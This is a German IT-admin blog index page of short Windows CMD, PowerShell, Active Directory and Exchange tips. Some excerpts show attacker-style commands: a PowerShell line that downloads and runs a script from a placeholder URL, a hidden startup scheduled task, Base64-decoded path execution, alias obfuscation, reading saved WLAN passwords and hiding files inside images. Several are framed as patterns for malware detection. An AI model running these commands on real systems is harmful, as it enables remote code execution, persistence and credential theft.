kiefergruen.com Der Waldmeister

Active Directory

An welchem DC Server bin ich angemeldet?

Die Anmeldung eines Clients am Active Directory findet sich in der Umgebungsvariable %logonserver% auf der Konsole: echo %logonserver% Der Befehl zeigt den Namen des Domain Controllers an, auf den sich der Client aktuell verbunden hat. Dies ist hilfreich für Diagnose und Troubleshooting. Die Information wird direkt in der Kommandozeile angezeigt....

Weiterlesen →
Abgelaufene AD-Konten in Entra ID

Wer ein on-premise AD betreibt, das in die Cloud synct, also sich mit dem (früheren AzureAD) Entra ID verschmelzt, der sollte tunlichst darauf achten, dass abgelaufene Konten aus dem on-premise AD dann plötzlich wieder nutzbar sind im Entra ID. Dieser Zusammenhang besteht, wenn das Attribut expiration-date gefüllt ist, aber der Account weiterhin auf "enabled" steht. Da es im Entra ID kein expiration-date gibt, werden also bei einem Sync-Vorgang geglaubte deaktivierte Konten "plötzlich" wieder aktiv....

Weiterlesen →

Anti-Malware

Alias von Kommandos

Neben dem Verstecken von Kommandos gibt es auch noch die einfache Möglichkeit die vorhandenen PowerShell-Kommandos mit Aliasen zu versehen. Das kann praktische Gründe haben, kann aber auch im Rahmen von Malware vorkommen, wenn man Kommandos verstecken will. Ein Alias geht wie folgt: $alias = 'Get-Dir'; Set-Alias -Name $alias -Value Get-ChildItem; Invoke-Expression $alias Hier gilt es auf die Stichwörter Set-Alias sowie erneut auf Invoke-Expression zu achten....

Weiterlesen →
Festplatte auf Ereignisse überwachen

Die PowerShell eignet sich auch dafür, dass man Ereignisse auf seinem Rechner im Detail überwacht, beispielsweise Aktivitäten auf der Festplatte. Wenn eine Malware beispielsweise neue Dateien anlegt, so kann man dies mittels FileMon von SysInternals (migriert zu Process Monitor) mitbekommen. Es geht aber auch mittels PowerShell mit ein paar Befehlen, wie folgt: $watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }....

Weiterlesen →
Pfad-Angaben verstecken

Auf der Suche nach Mustern für verdächtige PowerShell-Ausführungen (weitere Beispiele) findet sich auch oft die Nutzung von codierten Strings. Beispiel ist die zuvor codierte Pfadangabe mittels Base64 dann beim „Opfer" wieder in eine lesbare Pfadangabe zu decodierten und dann auszuführen, wie folgt: $path = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QzpcVGVtcFxBZG1pblRvb2xz')); Invoke-Item $path Es gilt also auf die Befehle „Invoke-Item" zu achten....

Weiterlesen →
Scheduled Task erstellen

Unter Windows lassen sich PowerShell-Befehle auch ganz einfach in einen wiederkehrenden Task, sogenannte Scheduled Tasks, verwandeln. Folgendes Beispiel illustriert diese Vorgehensweise: $action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "BEFEHL"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Mein Task' -Description 'Beschreibung' Man muss lediglich das Feld „BEFEHL" durch den PowerShell-Befehl ersetzen....

Weiterlesen →
Verstecken von Kommandos

Bei maliziösen PowerShells in freier Wildbahn sollte man auf der Hut. Allerdings muss man auch die besagten Kommandos erkennen, die schadhaft oder zumindest verdächtig sind. Die „Endgegner" versuchen mit allen Methoden ihre Künste zu verstecken, sowohl vor der Abwehr als auch schon bei der Erkennung sowie Ausführung. Ein beliebtes Beispiel sind die Obfuscation-Methoden, die man immer wieder findet....

Weiterlesen →
Antivirus für Zuhause plus zentraler Steuerung plus bezahlbar

Es gibt ja bekanntlich zahlreiche IT-Sicherheitsprodukte für den Heimbereich. Schnell fündig wird man über av-test.org und sucht sich nach Betriebssystem dann das für einen beste Produkt aus. Hat man aber mehrere Geräte und zudem verschiedene Betriebssysteme (beispielsweise iOS, Android, Windows, Linux, MacOSX), dann wird die Auswahl plötzlich wesentlich dünner....

Weiterlesen →

CMD Konsole

Aktuelle DNS-Einträge im Cache unter Windows

Möchte man sich die aktuell aufgelösten Einträge mit ihrer TTL unter Windows anschauen, so gibt es dazu direkt einen Befehl, der einem diese Informationen auf der Windows-Konsole liefert, wie folgt: ipconfig /displaydns Dies zeigt alle aktuell im DNS-Cache vorhandenen Einträge mit ihrer verbleibenden Gültigkeitsdauer....

Weiterlesen →
Aktuellen Ordner zippen mit PowerShell in der CMD

Wenn man mal eben einen Ordner auf der Kommandozeile zippen will, ohne auf fremde Tools zurückgreifen zu wollen, so geht dies recht einfach in der Windows-Konsole (CMD) und dem PowerShell-Befehl Compress-Archive, wie folgt: powershell Compress-Archive . Datei.zip Hier ist zu beachten, dass die Angabe des Punktes („.") das aktuelle Verzeichnis darstellt....

Weiterlesen →
Aufräumen des Systems mit CMD Befehlen

Will man sein Windows-System einmal gründlich aufräumen, so gibt es neben der bekannten Funktion „Dateibereinigung" auch einen versteckten Profi-Modus mit versteckten Löschoptionen, die sich nur mit einem CMD-Befehl nutzen lässt. Dazu gibt es folgenden Befehl, den mal als Admin ausführen muss: cleanmgr /sageset:65535 /sagerun:65535 Es erscheint das bekannte Fenster der Datenträger-Bereinigung, aber es bietet nun einige zusätzliche Optionen....

Weiterlesen →
Output von Windows CMD Befehl automatisch in Zwischenablage

Man kennt ja sicherlich die Möglichkeit in der Windows CMD Konsole die Ergebnisse in die Zwischenablage zu befördern. Leider ist aber die Vorgehensweise dazu nur nervig. Einfacher geht es wie folgt. Starte die Eingabeaufforderung (CMD) und gib den Befehl ein, für den Sie die Ausgabe kopieren möchten, gefolgt von „| clip", wie folgt: ipconfig /all | clip....

Weiterlesen →
Dateien verstecken mit der CMD Konsole

CMD ermöglicht einen Befehl, mit dem Sie zwei Dateien zu einer einzigen Datei verketten oder zusammenführen können. Eigentlich kommt diese Funktion aus der Anforderung zum Zusammenführen der Inhalte grundlegender Dateitypen wie TXT oder CSV. Aber man kann den Befehl auch dazu nutzen, zwei Dateien zusammen zu kopieren und damit eine komprimierte Datei beispielsweise in einer Bilddatei zu verstecken....

Weiterlesen →
Kerberos Tickets anzeigen

Wenn du wissen möchtest, welche Berechtigungen gerade auf einem Windows-Endpunkt bestehen, kannst du die Kerberos-Tickets anzeigen lassen. Das kann dir helfen festzustellen, ob eine Authentifizierung erfolgreich war oder nicht. Der Befehl auf der normalen Windows-Konsole (CMD.EXE) ist recht einfach: klist Damit erhält man dann alle aktiven Sessions auf einer Maschine....

Weiterlesen →
Ping vs Pathping

Oft bastelt man mit den Tools ping oder tracert herum, um Verfügbarkeit von Endpunkten (ping) oder die dahinterliegende Strecke (tracert) zu analysieren. Einfacher geht es mit pathping, denn: Der Hauptunterschied besteht darin, dass Ping die ICMP-Verfügbarkeit des Endpunkts anzeigt, die aus der Verfügbarkeit von Hops in der Mitte und dem Zustand des Endpunkts besteht. Beim Pathping wird einem der Zustand der gesamten Route angezeigt....

Weiterlesen →
Shortcuts in Windows CMD Konsole

Man mag es nicht täglich nutzen müssen, aber dennoch sollte man wissen dass es auch Shortcuts in der Microsoft Windows Konsole gibt, die manchmal nützlich sein können. F1: Befehl Buchstabe für Buchstabe erneut eingeben. F3: Gibt die gesamte vorherige Zeile erneut ein. F7: Öffnet eine Liste der zuvor eingegebenen Befehle....

Weiterlesen →
Temporäre Dateien adhoc löschen mit einem Befehl unter CMD Konsole

Man kann temporäre Dateien in seinem Benutzerverzeichnis ohne große Umwege oder Tools einfach mit einem schnellen Befehl löschen. Dies erfordert keine Admin-Berechtigungen. Der Befehl lautet: del /q /f /s %temp%* Die Parameter q, f und s dienen dazu, dass alle Dateien mit allen Unterverzeichnissen in dem temporären Ordner gelöscht werden, ohne Nachfrage und inklusive versteckter Dateien....

Weiterlesen →
Verzeichnisstruktur in der Windows CMD Konsole anzeigen

Oft befindet man sich in der Windows CMD Konsole und hangelt sich mit „dir"-Befehlen durch, um zu sehen, welche Dateien und Verzeichnisse existieren. Die Übersicht über die Verzeichnisstruktur, wie man diese aus dem Windows Explorer kennt, wird nicht unterstützt. Oder etwa doch? Ja, mit dem Befehl tree kann man ganz einfach die Verzeichnisstruktur des aktuellen Verzeichnisses visualisieren....

Weiterlesen →
„Wer bin ich?" auf der Windows-Konsole

Braucht man schnell die Basis-Informationen wie Benutzernamen und Gruppenzugehörigkeiten, so lockt dazu der Befehl whoami unter der Windows-Konsole mit allen nützlichen Infos. Die wichtigen Befehle sind: whoami, whoami /upn, whoami /fqdn, whoami /user, whoami /groups....

Weiterlesen →
Windows sauber und in Ordnung halten

SFC (System File Checker) ist eine relativ neue Ergänzung zur Eingabeaufforderung, um sein Windows sauber und fehlerfrei zu halten. Es handelt sich um ein praktisches Befehlszeilentool, mit dem man viele Systemprobleme beheben kann, wie folgt: sfc /scannow Nach dem Absetzen des Befehls beginnt die Überprüfung der Integrität aller geschützten Systemdateien....

Weiterlesen →

Exchange Online

Absender in Exchange Shared Mailbox blockieren mittels PowerShell

Wer regelmäßig mit dem Outlook Client arbeitet und eine Exchange Mailbox eingebunden hat, wird irgendwann auf eine Besonderheit stoßen: gesperrte Absender lassen sich für eine Shared Mailbox nicht über die normale GUI verwalten. Die Pflege von gesperrten Absendern für eine verwaltete Mailbox erfolgt nur über OWA oder PowerShell. Ich bevorzuge PowerShell....

Weiterlesen →
Authentifiziertes SMTP in Microsoft Exchange für einzelne Mailboxen

Wer auf Microsoft Exchange setzt, nutzt in der Regel einen Client wie Outlook, um Mails zu versenden und zu empfangen. Es gibt aber auch Dienste oder Anwendungen, die nur SMTP mit Authentifizierung sprechen. Dann steht man vor dem Dilemma, das Protokoll freizuschalten, aber nicht für den gesamten Tenant....

Weiterlesen →
Exchange Online – Quarantäne Mails löschen

Arbeitet man innerhalb von Microsofts Exchange Online mit der Quarantäne, so wird man recht schnell feststellen, wie mühselig die GUI reagiert, immer wieder Reloads durchführt und einem das Leben zur "Hölle" machen kann. Abhilfe schafft hier die Nutzung einiger PowerShell-Scripte, die man nach Belieben für seine Zwecke anpassen kann....

Weiterlesen →
Exchange Online: Quarantäne leeren von geblockten Absendern

Im Rahmen der Nutzung von Exchange Online wird man irgendwann feststellen, dass E-Mails, deren Absender bereits in der Tenant-Blockliste gesperrt sind, nicht gelöscht werden, sondern weiterhin angenommen werden. Diese landen in der E-Mail-Quarantäne von Exchange Online, allerdings ist der Filter so gesetzt, dass man diese nicht sieht....

Weiterlesen →

Microsoft Defender

Exchange Online – Quarantäne Mails löschen

Arbeitet man innerhalb von Microsofts Exchange Online mit der Quarantäne, so wird man recht schnell feststellen, wie mühselig die GUI reagiert, immer wieder Reloads durchführt und einem das Leben zur "Hölle" machen kann. Zudem stellt man fest, dass bei dem "Freilassen" von Mails ("release"), diese weiterhin dort angezeigt werden und somit ein Ansichtsfilter von Nöten ist....

Weiterlesen →
Große (Log-)Dateien unter Windows auslesen

Oft steht man vor dem Problem, dass grosse Logdateien jeden Dateibetrachter wie notepad.exe in die Knie zwingen. Nimmt man eine komfortable Version eines Editors wie Notepad++, so hängt der sich auch mal gerne auf, wenn die Datei größer als 1GB wird. Das gibt es netterweise auch unter Windows unter Zuhilfe des PowerShell-CMDlets 'Get-Content'....

Weiterlesen →

Monitoring

CPU Auslastung prüfen und alarmieren

Mittels PowerShell kann man automatisiert die CPU überwachen und eine Alarmmeldung auslösen, sobald ein Schwellenwert überschritten wird. Der Parameter "cpuThreshold" gibt das Limit für die CPU an, ab der alarmiert werden soll. Das Intervall ist mit "Start-Sleep" einstellbar. Dies ist besonders nützlich für Administratoren, die ihre Systeme proaktiv überwachen möchten....

Weiterlesen →

Nepper Schlepper Bauernfänger

Wer verbirgt sich hinter Abzockern, die IT-Support vorgeben?

Spannende Dokumentation über die Abzock-Methoden, die IT-Support vorgeben. Mit ganz viel Recherche-Aufwand wird hier gezeigt, wie ein typischer Scammer vorgeht, wie sein Geschäftsmodell aufgebaut ist und wie man ihm auf die Spur kommt. Wirklich sehenswert....

Weiterlesen →

OpenSSL

Checken, wann das Webseiten-Zertifikat abläuft

Mit dem Kommandozeilen-Werkzeug OpenSSL lässt sich komfortabel prüfen, wann ein Webseiten-Zertifikat abläuft. Normalerweise holt man sich das Zertifikat als Datei auf die Platte, und prüft dann mit dem klassischen OpenSSL-Kommando wie folgt: openssl x509 -in certificate.txt -text -noout Um nun aber in einem Rutsch das Zertifikat einer Webseite zu ziehen und die Prüfung vorzunehmen, muss man mittels OpenSSL eine Client-Anfrage generieren....

Weiterlesen →

PowerShell

Absender in Exchange Shared Mailbox blockieren mittels PowerShell

Wer regelmäßig mit dem Outlook Client arbeitet und eine Exchange Mailbox eingebunden hat, wird irgendwann auf eine Besonderheit stoßen: gesperrte Absender lassen sich für eine Shared Mailbox nicht über die normale GUI verwalten. Die Pflege von gesperrten Absendern für eine verwaltete Mailbox erfolgt nur über OWA oder PowerShell. Ich bevorzuge PowerShell....

Weiterlesen →
Aktuellen Ordner zippen mit PowerShell in der CMD

Wenn man mal eben einen Ordner auf der Kommandozeile zippen will, ohne auf fremde Tools zurückgreifen zu wollen, so geht dies recht einfach in der Windows-Konsole (CMD) und dem PowerShell-Befehl Compress-Archive, wie folgt: powershell Compress-Archive . Datei.zip Hier ist zu beachten, dass die Angabe des Punktes („.") das aktuelle Verzeichnis darstellt....

Weiterlesen →
CPU Auslastung prüfen und alarmieren

Mittels PowerShell kann man automatisiert die CPU überwachen und eine Alarmmeldung auslösen, sobald ein Schwellenwert überschritten wird. Der Parameter „cpuThreshold" gibt das Limit für die CPU an, ab der alarmiert werden soll. Das Intervall ist mit „Start-Sleep" einstellbar....

Weiterlesen →
Einträge in der Windows-Ereignisanzeige per PowerShell abfragen

Wenn man einmal schnell die Fehlermeldungen oder auch nur Warnungen von Windows aus der Ereignisanzeige mittels PowerShell abrufen will, so kann man dies mit folgendem Kommando: get-winevent -FilterHashtable @{Logname = 'System';Level=2} -MaxEvents 30 | sort-Object ProviderName,TimeCreated Will man auch noch die Warnungen dazu haben, so muss aus Level=2 einfach Level=3 werden....

Weiterlesen →
Exchange Online: Quarantäne leeren von geblockten Absendern

Im Rahmen der Nutzung von Exchange Online wird man irgendwann feststellen, dass E-Mails, deren Absender bereits in der Tenant-Blockliste gesperrt sind, nicht gelöscht werden, sondern weiterhin angenommen werden. Diese landen in der E-Mail-Quarantäne von Exchange Online....

Weiterlesen →
Große (Log-)Dateien unter Windows auslesen

Oft steht man vor dem Problem, dass grosse Logdateien jeden Dateibetrachter wie notepad.exe in die Knie zwingen. Wenn man beispielsweise weiß, dass man nur die letzten 500 Einträge einer zeitlich iterativen Datei sichten will, so kann man das unter Linux bekannte 'tail' nutzen. Das gibt es netterweise auch unter Windows unter Zuhilfe des PowerShell-CMDlets 'Get-Content'....

Weiterlesen →
Befehl auf remote Maschine ausführen

Wie schon in meinem anderen PowerShell-Posting zum Administrieren von remote Maschinen, geht es hier um das Gleiche, allerdings mit einem anderen Befehl. Invoke-Command -ComputerName ZielPC -ScriptBlock { Get-Process } -Credential (Get-Credential) In diesem Falle wird der Befehl Get-Process ausgeführt....

Weiterlesen →
Befehl letzte Änderung des Passworts eines Benutzers im Active Directory

Wann hat ein User das letzte Mal sein Passwort geändert? Wenn ich ein Active Directory einsetze und PowerShell nutzen möchte, so lautet der Befehl dazu wie folgt: Get-ADUser USER -Properties PwdLastSet | Select-Object Name,UserPrincipalName,@{N="PasswordDate";e={[DateTime]::FromFileTime($_.Pwdlastset)}} Man muss lediglich das Wort USER durch den Benutzernamen ersetzen....

Weiterlesen →
Eventlog auslesen

Mittels PowerShell lässt sich recht einfach der Eventlog (Ereignisanzeige) auslesen, in dem man als Paramter die Art des Logs (hier Security) auswählt und dann noch beispielsweise nach einem Event (Ereignis) filtern kann. Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}....

Weiterlesen →
ipconfig Nachbau

Will man die Details über die Netzwerkkonfiguration von Windows erfahren, so nimmt man standardmässig den Befehl ipconfig/all unter der CMD Konsole. Unter PowerShell geht das wie folgt genauso gut: Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNServer Damit erhält man alle Netzwerk-Informationen direkt vom System....

Weiterlesen →
Netzwerk Konfiguration auslesen

Will man mittels PowerShell die in Windows hinterlegten Netzwerk-Konfigurationen auslesen, so nimmt sich man den folgenden Befehl: Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNServer Dieser Befehl sammelt Netzwerkkonfigurationsdetails wie Schnittstellenaliase, IPv4- und IPv6-Adressen und DNS-Serverinformationen....

Weiterlesen →
Suche in Dateien nach Inhalten

Bevor man den Windows-Explorer anschmeißt um Dateien und dessen Inhalte zu suchen, ist man mittels PowerShell hier eventuell viel schneller unterwegs. Dazu bedient man sich des folgenden Befehls: Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'suchwort' -CaseSensitive Vorteil dieser Methode ist, dass man hier gezielt mit Platzhaltern agieren kann....

Weiterlesen →
TaskManager – Prozesse auslesen und darstellen

Der folgende Befehl listet alle Prozesse auf, sortiert nach CPU-Nutzung: Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending Dies bietet eine übersichtliche Darstellung aller laufenden Prozesse und ihrer CPU-Auslastung....

Weiterlesen →
WLAN Passwörter auslesen

Mittels PowerShell lassen sich für alle Profile (verschiedene abgespeicherte WLANs) die jeweiligen Einstellungen als auch die mitgespeicherten Passwörter auslesen. Dieser Befehl listet die abgespeicherten WLAN-Profile auf: netsh wlan show profiles Mit dem Profilnamen lässt sich dann das Profil auslesen, inklusive Passwort....

Weiterlesen →
Regeln von Mailboxen in Exchange Online

Wer sich schon einmal gewundert hat, dass es in der Verwaltung von Exchange Online Mailboxen trotz fehlender Dauerweiterleitungen dennoch Anomalien gibt, dem sei geholfen, einmal in die Regeln einer User-Mailbox selbst hineinzuschauen. Schneller geht es, wenn man direkt mittels PowerShell in die Mailbox-Regeln des jeweiligen Users reinschaut....

Weiterlesen →
Automatisch Screenshots machen (alle 60 Sekunden)

Wenn man einen Screenshot automatisch vom Bildschirm erstellen möchte, kann man das mit PowerShell komfortabel lösen. Add-Type -AssemblyName System.Drawing function Take-Screenshot { $screenWidth = [System.Windows.Forms.SystemInformation]::PrimaryMonitorSize.Width....

Weiterlesen →
Windows – Suche in Dateien mit Ausgabe aller Treffer

Oft steht man vor dem Problem, dass man einen großen Logfile hat und nach einem Stichwort in der Datei suchen will. Der Windows Explorer bietet hier nicht immer die beste Ausgabe. PowerShell hilft mit Select-String, um alle Treffer mit Zeilennummern zu finden. Select-String -Path .\datei.log -Pattern 'Stichwort' > Ausgabe.txt....

Weiterlesen →

Sicherheit

IT-Risiko: Wie man Sicherheitsrisiken im Alltag reduziert

IT-Risiken können aus vielen Quellen stammen: unsichere Passwörter, veraltete Systeme oder fehlende Backups. Der erste Schritt ist das Bewusstsein. Wichtig sind klare Prozesse für den Umgang mit sensiblen Daten und regelmäßige Überprüfungen der Systeme....

Weiterlesen →
Sichere Passwörter erstellen und einfach verwalten

Nein, sichere Passwörter müssen nicht kompliziert wirken. Viel wichtiger ist ein sicherer Umgang und eine klare Beschreibung der Anwendung. Der praktische Weg ist oft ein Passwortmanager, der die Komplexität kümmert. Es ist wichtig, lange Passwörter mit mindestens 12 Zeichen zu verwenden....

Weiterlesen →
Sicherer Austausch von Passwörtern

Wie tauscht man auf sicherem Wege Passwörter aus? Oft gibt es nur komplexe Lösungen – oder man nutzt einen zweiten Kanal für den Schlüssel. Tools wie Password Pusher (pwpush.com) bieten eine Möglichkeit, Passwörter einmalig bereitzustellen und danach nicht mehr zugänglich zu machen....

Weiterlesen →

Sonstiges

Aktuelle DNS-Einträge im Cache unter Windows

Möchte man sich die aktuell aufgelösten Einträge mit ihrer TTL unter Windows anschauen, so gibt es dazu direkt einen Befehl, der einem diese Informationen auf der Windows-Konsole liefert, wie folgt: ipconfig /displaydns Dies zeigt alle aktuell im DNS-Cache vorhandenen Einträge mit ihrer verbleibenden Gültigkeitsdauer....

Weiterlesen →
Kerberos Tickets anzeigen

Wenn du wissen möchtest, welche Berechtigungen gerade auf einem Windows-Endpunkt bestehen, kannst du die Kerberos-Tickets anzeigen lassen. Das kann dir helfen festzustellen, ob eine Authentifizierung erfolgreich war oder nicht. Der Befehl auf der normalen Windows-Konsole (CMD.EXE) ist recht einfach: klist....

Weiterlesen →
Sicherer Austausch von Passwörtern

Wie tauscht man auf sicherem Wege Passwörter aus? Oft gibt es nur komplexe Lösungen – oder man nutzt einen zweiten Kanal für den Schlüssel. Tools wie Password Pusher (pwpush.com) bieten eine Möglichkeit, Passwörter einmalig bereitzustellen und danach nicht mehr zugänglich zu machen....

Weiterlesen →

Tipps

Aktuelle DNS-Einträge im Cache unter Windows

Möchte man sich die aktuell aufgelösten Einträge mit ihrer TTL unter Windows anschauen, so gibt es dazu direkt einen Befehl: ipconfig /displaydns Dies zeigt alle aktuell im DNS-Cache vorhandenen Einträge mit ihrer verbleibenden Gültigkeitsdauer....

Weiterlesen →
Aufräumen des Systems mit CMD Befehlen

Will man sein Windows-System einmal gründlich aufräumen, so gibt es neben der bekannten Funktion „Dateibereinigung" auch einen versteckten Profi-Modus mit versteckten Löschoptionen. Dazu gibt es folgenden Befehl, den mal als Admin ausführen muss: cleanmgr /sageset:65535 /sagerun:65535....

Weiterlesen →
Output von Windows CMD Befehl automatisch in Zwischenablage

Man kennt ja sicherlich die Möglichkeit in der Windows CMD Konsole die Ergebnisse in die Zwischenablage zu befördern. Einfacher geht es wie folgt: Befehl eingeben, gefolgt von „| clip", wie folgt: ipconfig /all | clip....

Weiterlesen →
Dateien verstecken mit der CMD Konsole

CMD ermöglicht einen Befehl, mit dem Sie zwei Dateien zu einer einzigen Datei verketten oder zusammenführen können. Man kann den Befehl auch dazu nutzen, zwei Dateien zusammen zu kopieren und damit eine komprimierte Datei beispielsweise in einer Bilddatei zu verstecken....

Weiterlesen →
Freien Speicherplatz sicher löschen (ohne Extra-Tools) unter Microsoft Windows

Es gibt zahlreiche Tools die freie Speicherbereiche auf der Festplatte sicher löschen (also mit Nullen vollschreiben). Dazu gibt es jedoch auch Bordmittel von Microsoft Windows: Der Befehl cipher /W:C:\ löscht den freien Speicherplatz auf Laufwerk C:\....

Weiterlesen →
Große (Log-)Dateien unter Windows auslesen

Oft steht man vor dem Problem, dass grosse Logdateien jeden Dateibetrachter wie notepad.exe in die Knie zwingen. Wenn man beispielsweise weiß, dass man nur die letzten 500 Einträge einer zeitlich iterativen Datei sichten will, so kann man das unter Linux bekannte 'tail' nutzen. Das gibt es netterweise auch unter Windows unter Zuhilfe des PowerShell-CMDlets 'Get-Content'....

Weiterlesen →
Microsoft Viva Dienste wie Insights, Learning oder Digest für alle Benutzer abschalten

Man ist es ja mittlerweile gewohnt, dass neue Dienste aus dem Hause MS direkt angeschaltet werden, also ohne Opt-In. Das führt dann meist zu Verdruss bei Nutzern. Wenn beispielsweise jemand in Outlook auf eine E-Mail einen Like abgibt, dann erhält man später als Absender eine E-Mail von Microsoft mit dem Subject "Täglicher Reaktionsdigest". Diese Art der Benachrichtigung lässt sich nur per Benutzer einzeln abschalten. Oder halt mittels PowerShell....

Weiterlesen →
Automatisch Screenshots machen (alle 60 Sekunden)

Wenn man einen Screenshot automatisch vom Bildschirm erstellen möchte, kann man das mit PowerShell komfortabel lösen. Add-Type -AssemblyName System.Drawing function Take-Screenshot { $screenWidth = [System.Windows.Forms.SystemInformation]::PrimaryMonitorSize.Width....

Weiterlesen →
Screenshots per E-Mail versenden: Tipps und Tools

Wenn du jemandem Bilder per E-Mail sendest, achte darauf, sie kompakt und aussagekräftig bereitzustellen. Vermeide es, die originale Bildschirmauflösung als große PNG-Datei zu versenden, wenn nur Details sichtbar gemacht werden sollen....

Weiterlesen →
Temporäre Dateien adhoc löschen mit einem Befehl unter CMD Konsole

Man kann temporäre Dateien in seinem Benutzerverzeichnis ohne große Umwege oder Tools einfach mit einem schnellen Befehl löschen. Dies erfordert keine Admin-Berechtigungen. Der Befehl lautet: del /q /f /s %temp%*....

Weiterlesen →
„Wer bin ich?" auf der Windows-Konsole

Braucht man schnell die Basis-Informationen wie Benutzernamen und Gruppenzugehörigkeiten, so lockt dazu der Befehl whoami unter der Windows-Konsole mit allen nützlichen Infos. Die wichtigen Befehle sind: whoami, whoami /upn, whoami /fqdn, whoami /user, whoami /groups....

Weiterlesen →
Windows sauber und in Ordnung halten

SFC (System File Checker) ist eine relativ neue Ergänzung zur Eingabeaufforderung, um sein Windows sauber und fehlerfrei zu halten. Es handelt sich um ein praktisches Befehlszeilentool: sfc /scannow Nach dem Absetzen des Befehls beginnt die Überprüfung der Integrität aller geschützten Systemdateien....

Weiterlesen →
Einträge in der Windows-Ereignisanzeige per PowerShell abfragen

Wenn man einmal schnell die Fehlermeldungen oder auch nur Warnungen von Windows aus der Ereignisanzeige mittels PowerShell abrufen will, so kann man dies mit folgendem Kommando: get-winevent -FilterHashtable @{Logname = 'System';Level=2} -MaxEvents 30 | sort-Object ProviderName,TimeCreated....

Weiterlesen →
ipconfig Nachbau

Will man die Details über die Netzwerkkonfiguration von Windows erfahren, so nimmt man standardmässig den Befehl ipconfig/all unter der CMD Konsole. Unter PowerShell geht das wie folgt genauso gut: Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNServer....

Weiterlesen →
Remote Script ausführen

Es ist meist im Bereich Malware zu finden, aber manchmal gibt es wirklich die Anforderungen, dass man mittels PowerShell ein Skript aus dem Netz lädt und es dann ausführt. Dies geht wie folgt mit den beiden Befehlen: $url = 'http://example.com/script.ps1' Invoke-Expression (New-Object Net.WebClient).DownloadString($url)....

Weiterlesen →
Shortcuts in Windows CMD Konsole

Man mag es nicht täglich nutzen müssen, aber dennoch sollte man wissen dass es auch Shortcuts in der Microsoft Windows Konsole gibt, die manchmal nützlich sein können. F7: Öffnet eine Liste der zuvor eingegebenen Befehle. Das ist sehr praktisch....

Weiterlesen →
Verzeichnisstruktur in der Windows CMD Konsole anzeigen

Oft befindet man sich in der Windows CMD Konsole und hangelt sich mit „dir"-Befehlen durch, um zu sehen, welche Dateien und Verzeichnisse existieren. Ja, mit dem Befehl tree kann man ganz einfach die Verzeichnisstruktur des aktuellen Verzeichnisses und aller darunter befindlichen Ordner schnell visualisieren....

Weiterlesen →

Über uns

Über uns — Der Waldmeister

Der Waldmeister ist eine kleine statische Website, die technische Inhalte mit einer natürlichen, waldbasierten Ästhetik verbindet. Ziel ist es, Inhalte klar, performant und ohne WordPress-Komplexität bereitzustellen. Die Seite ist komplett statisch....

Weiterlesen →

Weitere Beispiele

Pfad-Angaben verstecken

Auf der Suche nach Mustern für verdächtige PowerShell-Ausführungen findet sich auch oft die Nutzung von codierten Strings. Beispiel ist die zuvor codierte Pfadangabe mittels Base64 dann beim „Opfer" wieder in eine lesbare Pfadangabe zu decodierten und dann auszuführen....

Weiterlesen →